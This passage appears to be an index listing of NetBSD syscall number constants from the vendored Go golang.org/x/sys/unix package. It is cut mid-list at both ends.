43) | SYS_PROFIL = 44 constant SYS_KTRACE (line 44) | SYS_KTRACE = 45 constant SYS_GETGID (line 45) | SYS_GETGID = 47 constant SYS___GETLOGIN (line 46) | SYS___GETLOGIN = 49 constant SYS___SETLOGIN (line 47) | SYS___SETLOGIN = 50 constant SYS_ACCT (line 48) | SYS_ACCT = 51 constant SYS_IOCTL (line 49) | SYS_IOCTL = 54 constant SYS_REVOKE (line 50) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 51) | SYS_SYMLINK = 57 constant SYS_READLINK (line 52) | SYS_READLINK = 58 constant SYS_EXECVE (line 53) | SYS_EXECVE = 59 constant SYS_UMASK (line 54) | SYS_UMASK = 60 constant SYS_CHROOT (line 55) | SYS_CHROOT = 61 constant SYS_VFORK (line 56) | SYS_VFORK = 66 constant SYS_SBRK (line 57) | SYS_SBRK = 69 constant SYS_SSTK (line 58) | SYS_SSTK = 70 constant SYS_VADVISE (line 59) | SYS_VADVISE = 72 constant SYS_MUNMAP (line 60) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 61) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 62) | SYS_MADVISE = 75 constant SYS_MINCORE (line 63) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 64) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 65) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 66) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 67) | SYS_SETPGID = 82 constant SYS_DUP2 (line 68) | SYS_DUP2 = 90 constant SYS_FCNTL (line 69) | SYS_FCNTL = 92 constant SYS_FSYNC (line 70) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 71) | SYS_SETPRIORITY = 96 constant SYS_CONNECT (line 72) | SYS_CONNECT = 98 constant SYS_GETPRIORITY (line 73) | SYS_GETPRIORITY = 100 constant SYS_BIND (line 74) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 75) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 76) | SYS_LISTEN = 106 constant SYS_GETSOCKOPT (line 77) | SYS_GETSOCKOPT = 118 constant SYS_READV (line 78) | SYS_READV = 120 constant SYS_WRITEV (line 79) | SYS_WRITEV = 121 constant SYS_FCHOWN (line 80) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 81) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 82) | SYS_SETREUID = 126 constant SYS_SETREGID (line 83) | SYS_SETREGID = 127 constant SYS_RENAME (line 84) | SYS_RENAME = 128 constant SYS_FLOCK (line 85) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 86) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 87) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 88) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 89) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 90) | SYS_MKDIR = 136 constant SYS_RMDIR (line 91) | SYS_RMDIR = 137 constant SYS_SETSID (line 92) | SYS_SETSID = 147 constant SYS_SYSARCH (line 93) | SYS_SYSARCH = 165 constant SYS_PREAD (line 94) | SYS_PREAD = 173 constant SYS_PWRITE (line 95) | SYS_PWRITE = 174 constant SYS_NTP_ADJTIME (line 96) | SYS_NTP_ADJTIME = 176 constant SYS_SETGID (line 97) | SYS_SETGID = 181 constant SYS_SETEGID (line 98) | SYS_SETEGID = 182 constant SYS_SETEUID (line 99) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 100) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 101) | SYS_FPATHCONF = 192 constant SYS_GETRLIMIT (line 102) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 103) | SYS_SETRLIMIT = 195 constant SYS_MMAP (line 104) | SYS_MMAP = 197 constant SYS_LSEEK (line 105) | SYS_LSEEK = 199 constant SYS_TRUNCATE (line 106) | SYS_TRUNCATE = 200 constant SYS_FTRUNCATE (line 107) | SYS_FTRUNCATE = 201 constant SYS___SYSCTL (line 108) | SYS___SYSCTL = 202 constant SYS_MLOCK (line 109) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 110) | SYS_MUNLOCK = 204 constant SYS_UNDELETE (line 111) | SYS_UNDELETE = 205 constant SYS_GETPGID (line 112) | SYS_GETPGID = 207 constant SYS_REBOOT (line 113) | SYS_REBOOT = 208 constant SYS_POLL (line 114) | SYS_POLL = 209 constant SYS_SEMGET (line 115) | SYS_SEMGET = 221 constant SYS_SEMOP (line 116) | SYS_SEMOP = 222 constant SYS_SEMCONFIG (line 117) | SYS_SEMCONFIG = 223 constant SYS_MSGGET (line 118) | SYS_MSGGET = 225 constant SYS_MSGSND (line 119) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 120) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 121) | SYS_SHMAT = 228 constant SYS_SHMDT (line 122) | SYS_SHMDT = 230 constant SYS_SHMGET (line 123) | SYS_SHMGET = 231 constant SYS_TIMER_CREATE (line 124) | SYS_TIMER_CREATE = 235 constant SYS_TIMER_DELETE (line 125) | SYS_TIMER_DELETE = 236 constant SYS_TIMER_GETOVERRUN (line 126) | SYS_TIMER_GETOVERRUN = 239 constant SYS_FDATASYNC (line 127) | SYS_FDATASYNC = 241 constant SYS_MLOCKALL (line 128) | SYS_MLOCKALL = 242 constant SYS_MUNLOCKALL (line 129) | SYS_MUNLOCKALL = 243 constant SYS_SIGQUEUEINFO (line 130) | SYS_SIGQUEUEINFO = 245 constant SYS_MODCTL (line 131) | SYS_MODCTL = 246 constant SYS___POSIX_RENAME (line 132) | SYS___POSIX_RENAME = 270 constant SYS_SWAPCTL (line 133) | SYS_SWAPCTL = 271 constant SYS_MINHERIT (line 134) | SYS_MINHERIT = 273 constant SYS_LCHMOD (line 135) | SYS_LCHMOD = 274 constant SYS_LCHOWN (line 136) | SYS_LCHOWN = 275 constant SYS_MSYNC (line 137) | SYS_MSYNC = 277 constant SYS___POSIX_CHOWN (line 138) | SYS___POSIX_CHOWN = 283 constant SYS___POSIX_FCHOWN (line 139) | SYS___POSIX_FCHOWN = 284 constant SYS___POSIX_LCHOWN (line 140) | SYS___POSIX_LCHOWN = 285 constant SYS_GETSID (line 141) | SYS_GETSID = 286 constant SYS___CLONE (line 142) | SYS___CLONE = 287 constant SYS_FKTRACE (line 143) | SYS_FKTRACE = 288 constant SYS_PREADV (line 144) | SYS_PREADV = 289 constant SYS_PWRITEV (line 145) | SYS_PWRITEV = 290 constant SYS___GETCWD (line 146) | SYS___GETCWD = 296 constant SYS_FCHROOT (line 147) | SYS_FCHROOT = 297 constant SYS_LCHFLAGS (line 148) | SYS_LCHFLAGS = 304 constant SYS_ISSETUGID (line 149) | SYS_ISSETUGID = 305 constant SYS_UTRACE (line 150) | SYS_UTRACE = 306 constant SYS_GETCONTEXT (line 151) | SYS_GETCONTEXT = 307 constant SYS_SETCONTEXT (line 152) | SYS_SETCONTEXT = 308 constant SYS__LWP_CREATE (line 153) | SYS__LWP_CREATE = 309 constant SYS__LWP_EXIT (line 154) | SYS__LWP_EXIT = 310 constant SYS__LWP_SELF (line 155) | SYS__LWP_SELF = 311 constant SYS__LWP_WAIT (line 156) | SYS__LWP_WAIT = 312 constant SYS__LWP_SUSPEND (line 157) | SYS__LWP_SUSPEND = 313 constant SYS__LWP_CONTINUE (line 158) | SYS__LWP_CONTINUE = 314 constant SYS__LWP_WAKEUP (line 159) | SYS__LWP_WAKEUP = 315 constant SYS__LWP_GETPRIVATE (line 160) | SYS__LWP_GETPRIVATE = 316 constant SYS__LWP_SETPRIVATE (line 161) | SYS__LWP_SETPRIVATE = 317 constant SYS__LWP_KILL (line 162) | SYS__LWP_KILL = 318 constant SYS__LWP_DETACH (line 163) | SYS__LWP_DETACH = 319 constant SYS__LWP_UNPARK (line 164) | SYS__LWP_UNPARK = 321 constant SYS__LWP_UNPARK_ALL (line 165) | SYS__LWP_UNPARK_ALL = 322 constant SYS__LWP_SETNAME (line 166) | SYS__LWP_SETNAME = 323 constant SYS__LWP_GETNAME (line 167) | SYS__LWP_GETNAME = 324 constant SYS__LWP_CTL (line 168) | SYS__LWP_CTL = 325 constant SYS___SIGACTION_SIGTRAMP (line 169) | SYS___SIGACTION_SIGTRAMP = 340 constant SYS_PMC_GET_INFO (line 170) | SYS_PMC_GET_INFO = 341 constant SYS_PMC_CONTROL (line 171) | SYS_PMC_CONTROL = 342 constant SYS_RASCTL (line 172) | SYS_RASCTL = 343 constant SYS_KQUEUE (line 173) | SYS_KQUEUE = 344 constant SYS__SCHED_SETPARAM (line 174) | SYS__SCHED_SETPARAM = 346 constant SYS__SCHED_GETPARAM (line 175) | SYS__SCHED_GETPARAM = 347 constant SYS__SCHED_SETAFFINITY (line 176) | SYS__SCHED_SETAFFINITY = 348 constant SYS__SCHED_GETAFFINITY (line 177) | SYS__SCHED_GETAFFINITY = 349 constant SYS_SCHED_YIELD (line 178) | SYS_SCHED_YIELD = 350 constant SYS_FSYNC_RANGE (line 179) | SYS_FSYNC_RANGE = 354 constant SYS_UUIDGEN (line 180) | SYS_UUIDGEN = 355 constant SYS_GETVFSSTAT (line 181) | SYS_GETVFSSTAT = 356 constant SYS_STATVFS1 (line 182) | SYS_STATVFS1 = 357 constant SYS_FSTATVFS1 (line 183) | SYS_FSTATVFS1 = 358 constant SYS_EXTATTRCTL (line 184) | SYS_EXTATTRCTL = 360 constant SYS_EXTATTR_SET_FILE (line 185) | SYS_EXTATTR_SET_FILE = 361 constant SYS_EXTATTR_GET_FILE (line 186) | SYS_EXTATTR_GET_FILE = 362 constant SYS_EXTATTR_DELETE_FILE (line 187) | SYS_EXTATTR_DELETE_FILE = 363 constant SYS_EXTATTR_SET_FD (line 188) | SYS_EXTATTR_SET_FD = 364 constant SYS_EXTATTR_GET_FD (line 189) | SYS_EXTATTR_GET_FD = 365 constant SYS_EXTATTR_DELETE_FD (line 190) | SYS_EXTATTR_DELETE_FD = 366 constant SYS_EXTATTR_SET_LINK (line 191) | SYS_EXTATTR_SET_LINK = 367 constant SYS_EXTATTR_GET_LINK (line 192) | SYS_EXTATTR_GET_LINK = 368 constant SYS_EXTATTR_DELETE_LINK (line 193) | SYS_EXTATTR_DELETE_LINK = 369 constant SYS_EXTATTR_LIST_FD (line 194) | SYS_EXTATTR_LIST_FD = 370 constant SYS_EXTATTR_LIST_FILE (line 195) | SYS_EXTATTR_LIST_FILE = 371 constant SYS_EXTATTR_LIST_LINK (line 196) | SYS_EXTATTR_LIST_LINK = 372 constant SYS_SETXATTR (line 197) | SYS_SETXATTR = 375 constant SYS_LSETXATTR (line 198) | SYS_LSETXATTR = 376 constant SYS_FSETXATTR (line 199) | SYS_FSETXATTR = 377 constant SYS_GETXATTR (line 200) | SYS_GETXATTR = 378 constant SYS_LGETXATTR (line 201) | SYS_LGETXATTR = 379 constant SYS_FGETXATTR (line 202) | SYS_FGETXATTR = 380 constant SYS_LISTXATTR (line 203) | SYS_LISTXATTR = 381 constant SYS_LLISTXATTR (line 204) | SYS_LLISTXATTR = 382 constant SYS_FLISTXATTR (line 205) | SYS_FLISTXATTR = 383 constant SYS_REMOVEXATTR (line 206) | SYS_REMOVEXATTR = 384 constant SYS_LREMOVEXATTR (line 207) | SYS_LREMOVEXATTR = 385 constant SYS_FREMOVEXATTR (line 208) | SYS_FREMOVEXATTR = 386 constant SYS_GETDENTS (line 209) | SYS_GETDENTS = 390 constant SYS_SOCKET (line 210) | SYS_SOCKET = 394 constant SYS_GETFH (line 211) | SYS_GETFH = 395 constant SYS_MOUNT (line 212) | SYS_MOUNT = 410 constant SYS_MREMAP (line 213) | SYS_MREMAP = 411 constant SYS_PSET_CREATE (line 214) | SYS_PSET_CREATE = 412 constant SYS_PSET_DESTROY (line 215) | SYS_PSET_DESTROY = 413 constant SYS_PSET_ASSIGN (line 216) | SYS_PSET_ASSIGN = 414 constant SYS__PSET_BIND (line 217) | SYS__PSET_BIND = 415 constant SYS_POSIX_FADVISE (line 218) | SYS_POSIX_FADVISE = 416 constant SYS_SELECT (line 219) | SYS_SELECT = 417 constant SYS_GETTIMEOFDAY (line 220) | SYS_GETTIMEOFDAY = 418 constant SYS_SETTIMEOFDAY (line 221) | SYS_SETTIMEOFDAY = 419 constant SYS_UTIMES (line 222) | SYS_UTIMES = 420 constant SYS_ADJTIME (line 223) | SYS_ADJTIME = 421 constant SYS_FUTIMES (line 224) | SYS_FUTIMES = 423 constant SYS_LUTIMES (line 225) | SYS_LUTIMES = 424 constant SYS_SETITIMER (line 226) | SYS_SETITIMER = 425 constant SYS_GETITIMER (line 227) | SYS_GETITIMER = 426 constant SYS_CLOCK_GETTIME (line 228) | SYS_CLOCK_GETTIME = 427 constant SYS_CLOCK_SETTIME (line 229) | SYS_CLOCK_SETTIME = 428 constant SYS_CLOCK_GETRES (line 230) | SYS_CLOCK_GETRES = 429 constant SYS_NANOSLEEP (line 231) | SYS_NANOSLEEP = 430 constant SYS___SIGTIMEDWAIT (line 232) | SYS___SIGTIMEDWAIT = 431 constant SYS__LWP_PARK (line 233) | SYS__LWP_PARK = 434 constant SYS_KEVENT (line 234) | SYS_KEVENT = 435 constant SYS_PSELECT (line 235) | SYS_PSELECT = 436 constant SYS_POLLTS (line 236) | SYS_POLLTS = 437 constant SYS_STAT (line 237) | SYS_STAT = 439 constant SYS_FSTAT (line 238) | SYS_FSTAT = 440 constant SYS_LSTAT (line 239) | SYS_LSTAT = 441 constant SYS___SEMCTL (line 240) | SYS___SEMCTL = 442 constant SYS_SHMCTL (line 241) | SYS_SHMCTL = 443 constant SYS_MSGCTL (line 242) | SYS_MSGCTL = 444 constant SYS_GETRUSAGE (line 243) | SYS_GETRUSAGE = 445 constant SYS_TIMER_SETTIME (line 244) | SYS_TIMER_SETTIME = 446 constant SYS_TIMER_GETTIME (line 245) | SYS_TIMER_GETTIME = 447 constant SYS_NTP_GETTIME (line 246) | SYS_NTP_GETTIME = 448 constant SYS_WAIT4 (line 247) | SYS_WAIT4 = 449 constant SYS_MKNOD (line 248) | SYS_MKNOD = 450 constant SYS_FHSTAT (line 249) | SYS_FHSTAT = 451 constant SYS_PIPE2 (line 250) | SYS_PIPE2 = 453 constant SYS_DUP3 (line 251) | SYS_DUP3 = 454 constant SYS_KQUEUE1 (line 252) | SYS_KQUEUE1 = 455 constant SYS_PACCEPT (line 253) | SYS_PACCEPT = 456 constant SYS_LINKAT (line 254) | SYS_LINKAT = 457 constant SYS_RENAMEAT (line 255) | SYS_RENAMEAT = 458 constant SYS_MKFIFOAT (line 256) | SYS_MKFIFOAT = 459 constant SYS_MKNODAT (line 257) | SYS_MKNODAT = 460 constant SYS_MKDIRAT (line 258) | SYS_MKDIRAT = 461 constant SYS_FACCESSAT (line 259) | SYS_FACCESSAT = 462 constant SYS_FCHMODAT (line 260) | SYS_FCHMODAT = 463 constant SYS_FCHOWNAT (line 261) | SYS_FCHOWNAT = 464 constant SYS_FEXECVE (line 262) | SYS_FEXECVE = 465 constant SYS_FSTATAT (line 263) | SYS_FSTATAT = 466 constant SYS_UTIMENSAT (line 264) | SYS_UTIMENSAT = 467 constant SYS_OPENAT (line 265) | SYS_OPENAT = 468 constant SYS_READLINKAT (line 266) | SYS_READLINKAT = 469 constant SYS_SYMLINKAT (line 267) | SYS_SYMLINKAT = 470 constant SYS_UNLINKAT (line 268) | SYS_UNLINKAT = 471 constant SYS_FUTIMENS (line 269) | SYS_FUTIMENS = 472 constant SYS___QUOTACTL (line 270) | SYS___QUOTACTL = 473 constant SYS_POSIX_SPAWN (line 271) | SYS_POSIX_SPAWN = 474 constant SYS_RECVMMSG (line 272) | SYS_RECVMMSG = 475 constant SYS_SENDMMSG (line 273) | SYS_SENDMMSG = 476 FILE: vendor/golang.org/x/sys/unix/zsysnum_netbsd_amd64.go constant SYS_EXIT (line 9) | SYS_EXIT = 1 constant SYS_FORK (line 10) | SYS_FORK = 2 constant SYS_READ (line 11) | SYS_READ = 3 constant SYS_WRITE (line 12) | SYS_WRITE = 4 constant SYS_OPEN (line 13) | SYS_OPEN = 5 constant SYS_CLOSE (line 14) | SYS_CLOSE = 6 constant SYS_LINK (line 15) | SYS_LINK = 9 constant SYS_UNLINK (line 16) | SYS_UNLINK = 10 constant SYS_CHDIR (line 17) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 18) | SYS_FCHDIR = 13 constant SYS_CHMOD (line 19) | SYS_CHMOD = 15 constant SYS_CHOWN (line 20) | SYS_CHOWN = 16 constant SYS_BREAK (line 21) | SYS_BREAK = 17 constant SYS_GETPID (line 22) | SYS_GETPID = 20 constant SYS_UNMOUNT (line 23) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 24) | SYS_SETUID = 23 constant SYS_GETUID (line 25) | SYS_GETUID = 24 constant SYS_GETEUID (line 26) | SYS_GETEUID = 25 constant SYS_PTRACE (line 27) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 28) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 29) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 30) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 31) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 32) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 33) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 34) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 35) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 36) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 37) | SYS_SYNC = 36 constant SYS_KILL (line 38) | SYS_KILL = 37 constant SYS_GETPPID (line 39) | SYS_GETPPID = 39 constant SYS_DUP (line 40) | SYS_DUP = 41 constant SYS_PIPE (line 41) | SYS_PIPE = 42 constant SYS_GETEGID (line 42) | SYS_GETEGID = 43 constant SYS_PROFIL (line 43) | SYS_PROFIL = 44 constant SYS_KTRACE (line 44) | SYS_KTRACE = 45 constant SYS_GETGID (line 45) | SYS_GETGID = 47 constant SYS___GETLOGIN (line 46) | SYS___GETLOGIN = 49 constant SYS___SETLOGIN (line 47) | SYS___SETLOGIN = 50 constant SYS_ACCT (line 48) | SYS_ACCT = 51 constant SYS_IOCTL (line 49) | SYS_IOCTL = 54 constant SYS_REVOKE (line 50) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 51) | SYS_SYMLINK = 57 constant SYS_READLINK (line 52) | SYS_READLINK = 58 constant SYS_EXECVE (line 53) | SYS_EXECVE = 59 constant SYS_UMASK (line 54) | SYS_UMASK = 60 constant SYS_CHROOT (line 55) | SYS_CHROOT = 61 constant SYS_VFORK (line 56) | SYS_VFORK = 66 constant SYS_SBRK (line 57) | SYS_SBRK = 69 constant SYS_SSTK (line 58) | SYS_SSTK = 70 constant SYS_VADVISE (line 59) | SYS_VADVISE = 72 constant SYS_MUNMAP (line 60) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 61) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 62) | SYS_MADVISE = 75 constant SYS_MINCORE (line 63) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 64) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 65) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 66) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 67) | SYS_SETPGID = 82 constant SYS_DUP2 (line 68) | SYS_DUP2 = 90 constant SYS_FCNTL (line 69) | SYS_FCNTL = 92 constant SYS_FSYNC (line 70) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 71) | SYS_SETPRIORITY = 96 constant SYS_CONNECT (line 72) | SYS_CONNECT = 98 constant SYS_GETPRIORITY (line 73) | SYS_GETPRIORITY = 100 constant SYS_BIND (line 74) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 75) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 76) | SYS_LISTEN = 106 constant SYS_GETSOCKOPT (line 77) | SYS_GETSOCKOPT = 118 constant SYS_READV (line 78) | SYS_READV = 120 constant SYS_WRITEV (line 79) | SYS_WRITEV = 121 constant SYS_FCHOWN (line 80) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 81) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 82) | SYS_SETREUID = 126 constant SYS_SETREGID (line 83) | SYS_SETREGID = 127 constant SYS_RENAME (line 84) | SYS_RENAME = 128 constant SYS_FLOCK (line 85) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 86) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 87) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 88) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 89) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 90) | SYS_MKDIR = 136 constant SYS_RMDIR (line 91) | SYS_RMDIR = 137 constant SYS_SETSID (line 92) | SYS_SETSID = 147 constant SYS_SYSARCH (line 93) | SYS_SYSARCH = 165 constant SYS_PREAD (line 94) | SYS_PREAD = 173 constant SYS_PWRITE (line 95) | SYS_PWRITE = 174 constant SYS_NTP_ADJTIME (line 96) | SYS_NTP_ADJTIME = 176 constant SYS_SETGID (line 97) | SYS_SETGID = 181 constant SYS_SETEGID (line 98) | SYS_SETEGID = 182 constant SYS_SETEUID (line 99) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 100) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 101) | SYS_FPATHCONF = 192 constant SYS_GETRLIMIT (line 102) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 103) | SYS_SETRLIMIT = 195 constant SYS_MMAP (line 104) | SYS_MMAP = 197 constant SYS_LSEEK (line 105) | SYS_LSEEK = 199 constant SYS_TRUNCATE (line 106) | SYS_TRUNCATE = 200 constant SYS_FTRUNCATE (line 107) | SYS_FTRUNCATE = 201 constant SYS___SYSCTL (line 108) | SYS___SYSCTL = 202 constant SYS_MLOCK (line 109) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 110) | SYS_MUNLOCK = 204 constant SYS_UNDELETE (line 111) | SYS_UNDELETE = 205 constant SYS_GETPGID (line 112) | SYS_GETPGID = 207 constant SYS_REBOOT (line 113) | SYS_REBOOT = 208 constant SYS_POLL (line 114) | SYS_POLL = 209 constant SYS_SEMGET (line 115) | SYS_SEMGET = 221 constant SYS_SEMOP (line 116) | SYS_SEMOP = 222 constant SYS_SEMCONFIG (line 117) | SYS_SEMCONFIG = 223 constant SYS_MSGGET (line 118) | SYS_MSGGET = 225 constant SYS_MSGSND (line 119) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 120) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 121) | SYS_SHMAT = 228 constant SYS_SHMDT (line 122) | SYS_SHMDT = 230 constant SYS_SHMGET (line 123) | SYS_SHMGET = 231 constant SYS_TIMER_CREATE (line 124) | SYS_TIMER_CREATE = 235 constant SYS_TIMER_DELETE (line 125) | SYS_TIMER_DELETE = 236 constant SYS_TIMER_GETOVERRUN (line 126) | SYS_TIMER_GETOVERRUN = 239 constant SYS_FDATASYNC (line 127) | SYS_FDATASYNC = 241 constant SYS_MLOCKALL (line 128) | SYS_MLOCKALL = 242 constant SYS_MUNLOCKALL (line 129) | SYS_MUNLOCKALL = 243 constant SYS_SIGQUEUEINFO (line 130) | SYS_SIGQUEUEINFO = 245 constant SYS_MODCTL (line 131) | SYS_MODCTL = 246 constant SYS___POSIX_RENAME (line 132) | SYS___POSIX_RENAME = 270 constant SYS_SWAPCTL (line 133) | SYS_SWAPCTL = 271 constant SYS_MINHERIT (line 134) | SYS_MINHERIT = 273 constant SYS_LCHMOD (line 135) | SYS_LCHMOD = 274 constant SYS_LCHOWN (line 136) | SYS_LCHOWN = 275 constant SYS_MSYNC (line 137) | SYS_MSYNC = 277 constant SYS___POSIX_CHOWN (line 138) | SYS___POSIX_CHOWN = 283 constant SYS___POSIX_FCHOWN (line 139) | SYS___POSIX_FCHOWN = 284 constant SYS___POSIX_LCHOWN (line 140) | SYS___POSIX_LCHOWN = 285 constant SYS_GETSID (line 141) | SYS_GETSID = 286 constant SYS___CLONE (line 142) | SYS___CLONE = 287 constant SYS_FKTRACE (line 143) | SYS_FKTRACE = 288 constant SYS_PREADV (line 144) | SYS_PREADV = 289 constant SYS_PWRITEV (line 145) | SYS_PWRITEV = 290 constant SYS___GETCWD (line 146) | SYS___GETCWD = 296 constant SYS_FCHROOT (line 147) | SYS_FCHROOT = 297 constant SYS_LCHFLAGS (line 148) | SYS_LCHFLAGS = 304 constant SYS_ISSETUGID (line 149) | SYS_ISSETUGID = 305 constant SYS_UTRACE (line 150) | SYS_UTRACE = 306 constant SYS_GETCONTEXT (line 151) | SYS_GETCONTEXT = 307 constant SYS_SETCONTEXT (line 152) | SYS_SETCONTEXT = 308 constant SYS__LWP_CREATE (line 153) | SYS__LWP_CREATE = 309 constant SYS__LWP_EXIT (line 154) | SYS__LWP_EXIT = 310 constant SYS__LWP_SELF (line 155) | SYS__LWP_SELF = 311 constant SYS__LWP_WAIT (line 156) | SYS__LWP_WAIT = 312 constant SYS__LWP_SUSPEND (line 157) | SYS__LWP_SUSPEND = 313 constant SYS__LWP_CONTINUE (line 158) | SYS__LWP_CONTINUE = 314 constant SYS__LWP_WAKEUP (line 159) | SYS__LWP_WAKEUP = 315 constant SYS__LWP_GETPRIVATE (line 160) | SYS__LWP_GETPRIVATE = 316 constant SYS__LWP_SETPRIVATE (line 161) | SYS__LWP_SETPRIVATE = 317 constant SYS__LWP_KILL (line 162) | SYS__LWP_KILL = 318 constant SYS__LWP_DETACH (line 163) | SYS__LWP_DETACH = 319 constant SYS__LWP_UNPARK (line 164) | SYS__LWP_UNPARK = 321 constant SYS__LWP_UNPARK_ALL (line 165) | SYS__LWP_UNPARK_ALL = 322 constant SYS__LWP_SETNAME (line 166) | SYS__LWP_SETNAME = 323 constant SYS__LWP_GETNAME (line 167) | SYS__LWP_GETNAME = 324 constant SYS__LWP_CTL (line 168) | SYS__LWP_CTL = 325 constant SYS___SIGACTION_SIGTRAMP (line 169) | SYS___SIGACTION_SIGTRAMP = 340 constant SYS_PMC_GET_INFO (line 170) | SYS_PMC_GET_INFO = 341 constant SYS_PMC_CONTROL (line 171) | SYS_PMC_CONTROL = 342 constant SYS_RASCTL (line 172) | SYS_RASCTL = 343 constant SYS_KQUEUE (line 173) | SYS_KQUEUE = 344 constant SYS__SCHED_SETPARAM (line 174) | SYS__SCHED_SETPARAM = 346 constant SYS__SCHED_GETPARAM (line 175) | SYS__SCHED_GETPARAM = 347 constant SYS__SCHED_SETAFFINITY (line 176) | SYS__SCHED_SETAFFINITY = 348 constant SYS__SCHED_GETAFFINITY (line 177) | SYS__SCHED_GETAFFINITY = 349 constant SYS_SCHED_YIELD (line 178) | SYS_SCHED_YIELD = 350 constant SYS_FSYNC_RANGE (line 179) | SYS_FSYNC_RANGE = 354 constant SYS_UUIDGEN (line 180) | SYS_UUIDGEN = 355 constant SYS_GETVFSSTAT (line 181) | SYS_GETVFSSTAT = 356 constant SYS_STATVFS1 (line 182) | SYS_STATVFS1 = 357 constant SYS_FSTATVFS1 (line 183) | SYS_FSTATVFS1 = 358 constant SYS_EXTATTRCTL (line 184) | SYS_EXTATTRCTL = 360 constant SYS_EXTATTR_SET_FILE (line 185) | SYS_EXTATTR_SET_FILE = 361 constant SYS_EXTATTR_GET_FILE (line 186) | SYS_EXTATTR_GET_FILE = 362 constant SYS_EXTATTR_DELETE_FILE (line 187) | SYS_EXTATTR_DELETE_FILE = 363 constant SYS_EXTATTR_SET_FD (line 188) | SYS_EXTATTR_SET_FD = 364 constant SYS_EXTATTR_GET_FD (line 189) | SYS_EXTATTR_GET_FD = 365 constant SYS_EXTATTR_DELETE_FD (line 190) | SYS_EXTATTR_DELETE_FD = 366 constant SYS_EXTATTR_SET_LINK (line 191) | SYS_EXTATTR_SET_LINK = 367 constant SYS_EXTATTR_GET_LINK (line 192) | SYS_EXTATTR_GET_LINK = 368 constant SYS_EXTATTR_DELETE_LINK (line 193) | SYS_EXTATTR_DELETE_LINK = 369 constant SYS_EXTATTR_LIST_FD (line 194) | SYS_EXTATTR_LIST_FD = 370 constant SYS_EXTATTR_LIST_FILE (line 195) | SYS_EXTATTR_LIST_FILE = 371 constant SYS_EXTATTR_LIST_LINK (line 196) | SYS_EXTATTR_LIST_LINK = 372 constant SYS_SETXATTR (line 197) | SYS_SETXATTR = 375 constant SYS_LSETXATTR (line 198) | SYS_LSETXATTR = 376 constant SYS_FSETXATTR (line 199) | SYS_FSETXATTR = 377 constant SYS_GETXATTR (line 200) | SYS_GETXATTR = 378 constant SYS_LGETXATTR (line 201) | SYS_LGETXATTR = 379 constant SYS_FGETXATTR (line 202) | SYS_FGETXATTR = 380 constant SYS_LISTXATTR (line 203) | SYS_LISTXATTR = 381 constant SYS_LLISTXATTR (line 204) | SYS_LLISTXATTR = 382 constant SYS_FLISTXATTR (line 205) | SYS_FLISTXATTR = 383 constant SYS_REMOVEXATTR (line 206) | SYS_REMOVEXATTR = 384 constant SYS_LREMOVEXATTR (line 207) | SYS_LREMOVEXATTR = 385 constant SYS_FREMOVEXATTR (line 208) | SYS_FREMOVEXATTR = 386 constant SYS_GETDENTS (line 209) | SYS_GETDENTS = 390 constant SYS_SOCKET (line 210) | SYS_SOCKET = 394 constant SYS_GETFH (line 211) | SYS_GETFH = 395 constant SYS_MOUNT (line 212) | SYS_MOUNT = 410 constant SYS_MREMAP (line 213) | SYS_MREMAP = 411 constant SYS_PSET_CREATE (line 214) | SYS_PSET_CREATE = 412 constant SYS_PSET_DESTROY (line 215) | SYS_PSET_DESTROY = 413 constant SYS_PSET_ASSIGN (line 216) | 